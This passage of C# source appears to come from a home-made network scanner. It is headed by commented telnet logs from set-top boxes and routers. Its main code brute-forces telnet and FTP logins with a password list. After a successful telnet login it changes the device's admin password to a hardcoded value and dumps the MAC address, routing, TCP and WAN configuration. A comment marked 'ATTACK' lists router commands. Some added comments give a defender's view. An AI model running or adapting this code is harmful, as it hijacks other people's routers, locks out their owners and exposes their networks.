- //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
- //dreambox login: bad
- //Password:
- //Login incorrect
- //dreambox login: root
- //Password:
- //Login incorrect
- //dreambox login: root
- //Password:
- //Login incorrect
- //********************************************************
- //OpenDreambox 1.5.0 dm800
- //dm800 login:
- //dm800 login: bad
- //Password:
- //Login incorrect
- //dm800 login: root
- //root@dm800:~#
- //CCcam_2011 head pyhtmlizer
- //StartNabCam hexdump python
- //\[ hostname rdjpgcom
- //addgroup hotplug readlink
- //adduser id reboot
- //ar ifconfig reboot.sysvinit
- //arping ifdown renice
- //ash ifup reset
- //automount im rjoe
- //avahi-daemon inadyn rm
- //awk inadyn_script.sh rmdir
- //basename inetd rmmod
- //bdpoll init route
- //bookify init.sysvinit rquotad
- //bunzip2 insmod run-parts
- //busybox ip runlevel
- //bzcat ipkg rx
- //cat ipkg-cl scp
- //cftp ipkg-link sed
- //chat iwconfig seq
- //chgrp iwgetid sfdisk
- //chmod iwlist sh
- //chown iwpriv sha1sum
- //chroot iwspy showiframe
- //chvt jmacs showmount
- //cjpeg joe shutdown
- //ckeygen jpegtran shutdown.sysvinit
- //clear jpico sleep
- //conch jstar smartctl
- //cp kill smartd
- //cpio killall smbd
- //crond killall5 sort
- //crontab klogd ssh
- //cut last start-stop-daemon
- //czap last.sysvinit statd
- //date lastb streamproxy
- //dbclient ldconfig strings
- //dbus-cleanup-sockets less stty
- //dbus-daemon lessecho su
- //dbus-launch lesskey sulogin
- //dbus-monitor ln swapoff
- //dbus-send loadfont swapon
- //dbus-uuidgen loadkmap sync
- //dc lockd sysctl
- //dccamd logger syslogd
- //dd login szap
- //deallocvt logname t-im
- //delgroup logread tail
- //deluser lore tap2deb
- //depmod losetup tap2rpm
- //depmod.26 ls tapconvert
- //df lsmod tar
- //dirname mailmail tda1002x
- //djpeg makedevs tee
- //dmesg manhole telinit
- //dos2unix map-mbone telnet
- //dropbear mc telnetd
- //dropbearconvert mcedit termidx
- //dropbearkey mcmfmt test
- //dropbearmulti mcview time
- //du md5sum tkconch
- //dumpkmap mesg top
- //dvbsnoop mesg.sysvinit touch
- //dvbtraffic mkdir tput
- //e2fsck mke2fs tr
- //echo mkfifo traceroute
- //egrep mkfs.ext2 trial
- //enigma2 mkfs.ext3 true
- //enigma2.sh mknod tset
- //env mkswap tty
- //ethtool mktap tuxtxt
- //exportfs mktemp twistd
- //expr modprobe tzap
- //false more udhcpc
- //fbset mount umount
- //fdisk mountd uname
- //fdisk.util-linux mountpoint uniq
- //femon mrinfo unix2dos
- //fgrep mrouted unzip
- //find mv update-alternatives
- //free nc update-inetd
- //fsck.ext2 netstat update-modules
- //fsck.ext3 nfs_server_script.sh update-passwd
- //ftpget nfsd update-rc.d
- //ftpput nfsstat uptime
- //getepgchannels nhfsgraph utmpdump
- //getkey nhfsnums uudecode
- //getty nhfsrun uuencode
- //grab nhfsstone vi
- //grep nmbd vlock
- //gst-feedback nslookup vsftpd
- //gst-feedback-0.10 od wall
- //gst-inspect openvpn wall.sysvinit
- //gst-inspect-0.10 openvpn_script.sh watch
- //gst-launch openvt wc
- //gst-launch-0.10 passwd wdog
- //gst-typefind patch wget
- //gst-typefind-0.10 pidof which
- //gst-visualise-0.10 pidof.sysvinit who
- //gst-xmlinspect ping whoami
- //gst-xmlinspect-0.10 pivot_root wpa_cli
- //gst-xmllaunch poff wpa_passphrase
- //gst-xmllaunch-0.10 pon wpa_supplicant
- //gunzip portmap wrjpgcom
- //gzip poweroff xargs
- //halt pppd yes
- //halt.sysvinit printf zcat
- //hddtemp ps zeroconf
- //hdparm pwd
- //root@dm800:~#
- //root@dm800:~# passwd
- //Changing password for root
- //Enter the new password (minimum of 5, maximum of 8 characters)
- //Please use a combination of upper and lower case letters and numbers.
- //Enter new password:
- //Re-enter new password:
- //Password changed.
- //root@dm800:~#
- //********************************************************
- //BusyBox on (none) login: bad
- //Password:
- //Login incorrect
- //BusyBox on (none) login: admin
- //Password:
- //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
- //Enter 'help' for a list of built-in commands.
- //# help
- //Built-in commands:
- //-------------------
- // . : bg break builtin cd chdir continue eval exec exit export
- // false fc fg hash help jobs kill local pwd read readonly return
- // set setvar shift times trap true type ulimit umask unset wait
- //********************************************************
- //User Access Verification
- //
- //Password:
- //Password:
- //Password:
- //% Bad passwords
- //********************************************************
- //Huawei Home Gateway 550
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //Login: bad
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password:
- //Authorization failed after trying 3 times!!!.
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //Login:
- #endregion
- foreach (string password in passwords)
- {
- Thread.Sleep(100);
- try
- {
- Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- // Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
- //Console.WriteLine("DEBUG Trying Password:{0}", password);
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
- /*
- Byte[] smk = new Byte[password.Length];
- for (int i = 0; i < password.Length; i++)
- {
- Byte ss = Convert.ToByte(password[i]);
- smk[i] = ss;
- }
- Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
- */
- //Thread.Sleep(100);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
- if (stringdata == "")
- {
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
- }
- //stringdata = null;
- //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- //Console.WriteLine("Response telnet: " + strRetPage);
- //while (bytes > 0)
- //{
- // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- // stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- // Console.WriteLine("Response telnet: " + strRetPage);
- //}
- //Bad Password!!!
- if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password")) //stringdata.Contains("*")
- {
- // Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
- Sock_scan.Close();
- }
- else
- {
- Console.WriteLine("***********************************************************");
- Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
- Console.WriteLine("***********************************************************");
- if(stringdata.Contains("ZyXEL")) //1234
- {
- if (stringdata.Contains("Menu")) //1234
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- // Menu 23 - System Password
- //Old Password= ?
- //New Password= ?
- //Retype to confirm= ?
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //(Saving to ROM...)
- //Retour menu
- }
- else
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- }
- }
- else
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //save ok, new password is: j3R0m3!!.
- ////Exemple: Vulcan
- ////Erreur: Commande Invalide
- ////$passwd
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
- ////Enter Old Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- ////Enter New Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- ////Confirm New Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- ////Set Done
- ////SINON: Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
- }
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //***************
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None); //for MAC address
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- /*
- D-Link DSL 526B >restoredefault
- Huawei SmartAX MT882a >sys romreset
- TP-Link TD-8817 >sys romreset
- */
- //***************
- //For MT882A
- /*
- MT882a> ether config
- --------------- NDIS CONFIGURATION BLOCK ----------------
- type=1 flags=0001
- Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
- task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
- board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
- board-pp (8042c8f0)
- 804273fc
- line-pp (8042c8f4)
- 8042956c
- chann-pp (8042c8f8)
- 804bf8a4 804bfe34
- --------------- BOARD DISPLAY ---------------------------
- ID slot# n-line n-chann status line-cfg chann-cfg
- 00 0 1 2 0001 8042c8bc 8042c8d0
- --------------- LINE DISPLAY ---------------------------
- ID line# board-id n-chann chann-cfg
- 00 1 00 2 8042c8d0
- --------------- CHANNEL DISPLAY -------------------------
- ID chan# line-id board-id address name
- 00 1 00 00 804bf8a4 enet0
- 01 2 00 00 804bfe34 enet1
- */
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- /*
- MT882a> ip tcp status
- ( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
- ( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
- ( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
- ( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
- ( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
- (11)tcpOutSegs 2549 (12)tcpRetransSegs 389
- (14)tcpInErrs 2 (15)tcpOutRsts 93
- tcbsInUseCnt = 4
- &TCB Rcv-Q Snd-Q Local socket Remote socket State
- 804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
- 804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
- 804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
- 804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
- */
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //ATTACK
- /*
- MT882a> ip ping
- Usage: ping <hostid>
- MT882a> ip ping www.google.com
- Resolving www.google.com... 173.194.67.105
- sent rcvd rate rtt avg mdev max min
- 1 1 100 80 80 0 80 80
- 2 2 100 80 80 0 80 80
- 3 3 100 80 80 0 80 80
- */
- /*
- MT882a> ip route
- status add addiface addprivate
- addrom drop
- MT882a> ip route status
- Dest FF Len Device Gateway Metric stat Timer Use RN
- 41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
- 192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
- default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
- */
- /*
- MT882a> ether driver
- cnt status config ackdrop
- macnum ackmode etherppp wan2lan
- MT882a> ether driver cnt
- disp
- MT882a> ether driver cnt disp
- Usage: disp <name>
- MT882a> ether driver status
- Usage: driver status <ch-name>
- MT882a> ether driver config
- Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
- MT882a> ether driver ackdrop
- current ack drop number is 0
- ack drop cnt=0
- Usage: ackdrop <number>
- MT882a> ether driver macnum
- Please input allowed mac number(0~255), 0 means no limitation
- Current allowed mac number: 0
- MT882a> ether driver ackmode
- TCP ACK mode: off
- ACK length: 90
- TCP ACK mode type: Task
- MT882a> ether driver etherppp
- PPP check : on
- MT882a> ether driver wan2lan
- Usage: wan2lan [on||off] <number>
- Current wan2lan feature status: off
- */
- /*
- MT882a> wan
- atm node hwsar adsl
- tsarm
- MT882a> wan atm
- test mpoasendloop oam vcpool
- MT882a> wan atm test
- Usage: test [fix|rand|period|oam|loopback]
- MT882a> wan node
- index display clear save
- ispname enable disable encap
- mux vpi vci qos
- pcr scr mbs cdvt
- wanip remoteip bridge routeip
- nat rip multicast callsch
- service nailedup filter ppp
- mtu default_r
- MT882a> wan node display
- WAN node index = 1
- Active = no
- Route IP = off
- Bridge = off
- Name =
- Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
- Mux <1:LLC|2:VC> = 0
- VPI/VCI = 0 / 0
- PPPoE service name =
- PPP username =
- PPP password =
- PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
- SUA/NAT is disabled
- Static IP address
- WAN IP address = 0.0.0.0
- Remote IP address = 0.0.0.0
- Remote IP subnet mask = 0.0.0.0
- Idle timeout = 0
- Call scheduling set = 1 1 1 1
- Nailed-up connection = off
- QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
- QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
- RIP direction <0:none|1:both|2:in|3:out>= 0
- RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
- Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
- Incoming protocol filter set = 1 1 1 1
- Incoming device filter set = 1 1 1 1
- Outgoing protocol filter set = 1 1 1 1
- Outgoing device filter set = 1 1 1 1
- MT882a> wan node wanip
- Usage: wan node wanip <static> <ip address>
- or: wan node wanip <dynamic>
- errcode = -4
- */
- /*
- MT882a> wan adsl
- chandata close coding defbitmap
- linedata open opencmd opmode
- perfdata reset status version
- vendorid utopia nearituid farituid
- cellcnt display rateadap dumpcondition
- sampletime noisegt noisemargin persisttime
- timeinterval defectcheck txgain targetnoise
- txfilter setrvid txtones snroffset
- errorsecond diag watchdog fwversion
- uptime dumprate annex
- MT882a> wan adsl display
- shutdown rateup
- MT882a> wan adsl fwversion
- DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
- MT882a> wan adsl utopia
- UTOPIA parameters:
- level: 1
- fast address: 0
- interleaved address: 1
- MT882a> wan adsl coding
- line coding: DMT
- MT882a> wan adsl txtones
- usage: <start tone> <end tone> tone=0x6~0x1F
- current value: start_tone=6 end_tone=1f
- MT882a> wan adsl opmode
- operational mode: ITU G.992.5(ADSL2PLUS)
- MT882a> wan adsl uptime
- ADSL uptime 122:15:16
- MT882a> wan adsl sampletime
- Usage: min
- MT882a> wan adsl linedata
- far near
- MT882a> wan adsl linedata near
- relative capacity occupation: 100%
- noise margin downstream: 37.0 db
- output power upstream: 11.3 dbm
- attenuation downstream: 13.7 db
- MT882a> wan adsl linedata far
- relative capacity occupation: 100%
- noise margin upstream: 34.5 db
- output power downstream: 19.3 dbm
- attenuation upstream: 9.6 db
- carrier load: number of bits per symbol(tone)
- tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
- tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
- tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
- tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
- tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
- tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
- tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
- tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
- tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- MT882a> dot1q disp
- 802.1Q Tagged-based VLAN: Inactive(1)
- Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
- ------+--------++------+--------++------+--------++------+--------++
- e1 | 1 ||
- p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
- p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
- u | 1 ||
- cpu | 15 ||
- No|Act| VID| Name | Egress Port
- --+---+----+-----------+------------------------------------------
- | Tagged Egress Port
- +------------------------------------------
- 0| N | 0| |
- |
- 1| N | 0| |
- |
- 2| N | 0| |
- |
- 3| N | 0| |
- |
- 4| N | 0| |
- |
- 5| N | 0| |
- |
- 6| N | 0| |
- |
- 7| N | 0| |
- |
- 8| N | 0| |
- |
- 9| N | 0| |
- |
- 10| N | 0| |
- |
- 11| N | 0| |
- |
- 12| N | 0| |
- |
- 13| N | 0| |
- |
- 14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
- |
- 15| Y | 15| vlan15|e1,u
- |
- */
- Sock_scan.Close();
- break;
- }
- }
- catch (Exception e)
- {
- Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
- }
- }
- }
- else
- {
- Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
- }
- // Sock_scan.Close();
- }
- /// <summary>
- /// Tries each entry of the class-level passwords sequence (declared outside this method)
- /// against the FTP service on myip, port 21, always with the user name "admin".
- /// One TCP connection is opened, the banner is printed, and a USER/PASS pair is sent per
- /// entry on that same connection; the loop stops at the first reply containing "230".
- /// Every exchange, including each password tried, is written to the console in clear text.
- /// </summary>
- /// <param name="myip">IPv4 address literal of the host; IPAddress.Parse throws on anything else.</param>
- // Defender's view: the server sees a single control connection carrying many
- // "USER admin" / PASS pairs answered with 530, so a per-connection or per-source
- // failed-login limit interrupts the loop, and a non-default admin password leaves it
- // without a match.
- public static void ftptry(string myip)
- {
- Console.WriteLine("ftptry");
- // Each Receive below reads at most 1024 bytes; a longer reply is only seen in part.
- byte[] data = new byte[1024];
- string stringdata;
- int recv;
- IPAddress adresseIP = IPAddress.Parse(myip);
- IPEndPoint ip = new IPEndPoint(adresseIP, 21);
- Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- // Connect and the banner read run outside the try block, so a refused or reset
- // connection propagates to the caller as an exception.
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));
- foreach (string password in passwords)
- {
- try
- {
- Console.WriteLine("{0} -> USER", myip);
- // Character 32 is a space, 13 and 10 are CR LF: this sends the line "USER admin".
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
- recv = Sock_scan.Receive(data);
- Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
- // Sample replies seen at this step:
- //331 Please specify the password.
- //331 Enter PASS command
- //331 User name okay, need password.
- Console.WriteLine("{0} -> PASS", myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
- // Sample rejection replies; the test below is a substring match on the whole reply text.
- //530 Login incorrect.
- //530 Not logged in.
- //530 User admin cannot log in.
- if (stringdata.Contains("530"))
- {
- Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
- }
- // Sample acceptance reply; the first reply containing "230" ends the loop.
- //230 User logged in, proceed.
- if (stringdata.Contains("230"))
- {
- Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
- break;
- }
- }
- catch (Exception e)
- {
- // Any failure for one entry is printed and the loop moves on to the next entry.
- Console.WriteLine("{0} -> " + e.Message, myip);
- }
- }
- Sock_scan.Close();
- /*
- Disabled alternative based on FtpWebRequest, kept for reference.
- FtpWebRequest reqFTP;
- reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
- reqFTP.Credentials = new NetworkCredential("login", "pass");
- reqFTP.KeepAlive = false;
- reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
- // Fetch the FTP server's response
- FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
- Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
- /*
- // Get the response stream
- StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
- // Store the listing in a string
- string listeBrute = monStreamReader.ReadToEnd();
- // Split the string into the individual file entries
- string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
- // Return the directory listing
- //return liste;
- */
- }
- /*
- public static void ConnectCallback(IAsyncResult ar)
- {
- try
- {
- // Get The connection socket from the callback
- Socket sock1 = (Socket)ar.AsyncState;
- sock1.Blocking = false; // This is a non blocking IO
- if (sock1.Connected)
- {
- // Define a new Callback to read the data
- AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
- // Begin reading data asyncronously
- sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
- }
- }
- catch (Exception ex)
- {
- Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
- }
- }
- */
/// <summary>
/// Completion callback for an asynchronous connect: finishes the connect on the
/// socket carried in <paramref name="ar"/> and signals <c>connectDone</c>.
/// </summary>
/// <param name="ar">Async result whose <c>AsyncState</c> is the connecting <see cref="Socket"/>.</param>
private static void ConnectCallback(IAsyncResult ar)
{
    try
    {
        // The socket was handed over as the state object of the asynchronous call.
        Socket pending = (Socket)ar.AsyncState;

        // EndConnect throws when the connection attempt failed; that lands in the catch below.
        pending.EndConnect(ar);
        string peer = pending.RemoteEndPoint.ToString();
        Console.WriteLine("Socket connected to {0}", peer);

        // Release whoever is waiting on the connect event.
        connectDone.Set();
        Console.WriteLine("DEBUG ConnectCallback");
    }
    catch (Exception e)
    {
        // Failures are only logged; connectDone.Set() is not reached when an earlier call throws.
        Console.WriteLine("ERROR ConnectCallback: " + e.ToString());
    }
}
/// <summary>
/// Starts an asynchronous receive on <paramref name="client"/>; the data is
/// collected by <c>ReceiveCallback</c> through a fresh <c>StateObject</c>.
/// </summary>
/// <param name="client">Connected socket to read from.</param>
private static void Receive(Socket client)
{
    try
    {
        // The state object travels with the async call so the callback can find
        // both the socket and the buffer being filled.
        StateObject receiveState = new StateObject { workSocket = client };

        client.BeginReceive(
            receiveState.buffer,
            0,
            StateObject.BufferSize,
            SocketFlags.None,
            ReceiveCallback,
            receiveState);
    }
    catch (Exception e)
    {
        // Failures (including a null or closed socket) are only logged.
        Console.WriteLine(e.ToString());
    }
}
/// <summary>
/// Completion callback for an asynchronous receive. Non-empty reads are appended
/// to the state's text and another receive is queued; a zero-byte read publishes
/// the accumulated text in <c>response</c> and signals <c>receiveDone</c>.
/// </summary>
/// <param name="ar">Async result whose <c>AsyncState</c> is the <c>StateObject</c> of this receive.</param>
private static void ReceiveCallback(IAsyncResult ar)
{
    try
    {
        StateObject receiveState = (StateObject)ar.AsyncState;
        Socket source = receiveState.workSocket;

        int count = source.EndReceive(ar);
        if (count <= 0)
        {
            // Zero bytes: the peer finished sending. Text of one character or
            // less is not published.
            if (receiveState.sb.Length > 1)
            {
                response = receiveState.sb.ToString();
            }

            receiveDone.Set();
            return;
        }

        // Keep what arrived so far (decoded as ASCII) and ask for the next chunk.
        string chunk = Encoding.ASCII.GetString(receiveState.buffer, 0, count);
        receiveState.sb.Append(chunk);
        source.BeginReceive(
            receiveState.buffer,
            0,
            StateObject.BufferSize,
            SocketFlags.None,
            ReceiveCallback,
            receiveState);
    }
    catch (Exception e)
    {
